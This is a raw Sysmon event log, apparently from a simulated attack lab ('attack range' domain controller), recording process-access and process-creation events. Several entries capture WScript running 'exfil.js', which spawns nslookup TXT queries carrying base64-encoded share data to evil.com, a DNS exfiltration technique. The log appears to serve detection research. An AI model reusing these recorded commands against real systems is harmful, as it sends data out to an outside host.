14:21:34.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.728{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1744-000000005F02}3792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.728{2E1864BB-18E0-629A-6742-000000005F02}39767388C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-1744-000000005F02}3792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.734{2E1864BB-18EE-629A-1744-000000005F02}3792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwtud.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.728{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljtmdxwx.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.696{2E1864BB-18EE-629A-1544-000000005F02}32368072C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1644-000000005F02}2316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.696{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1644-000000005F02}2316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.696{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.696{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.696{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.696{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.696{2E1864BB-18EE-629A-1444-000000005F02}20205104C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-1644-000000005F02}2316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.701{2E1864BB-18EE-629A-1644-000000005F02}2316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-1444-000000005F02}2020C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljtmdxwx.tmp 2>&1 10341000x8000000000000000210015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.659{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1544-000000005F02}3236C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.659{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1544-000000005F02}3236C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.659{2E1864BB-18EE-629A-1544-000000005F02}32368072C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1444-000000005F02}2020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.659{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1544-000000005F02}3236C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.643{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1444-000000005F02}2020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.643{2E1864BB-18E0-629A-6742-000000005F02}39767772C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-1444-000000005F02}2020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.647{2E1864BB-18EE-629A-1444-000000005F02}2020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljtmdxwx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.643{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsvuwqy.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.612{2E1864BB-18EE-629A-1244-000000005F02}55561848C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1344-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 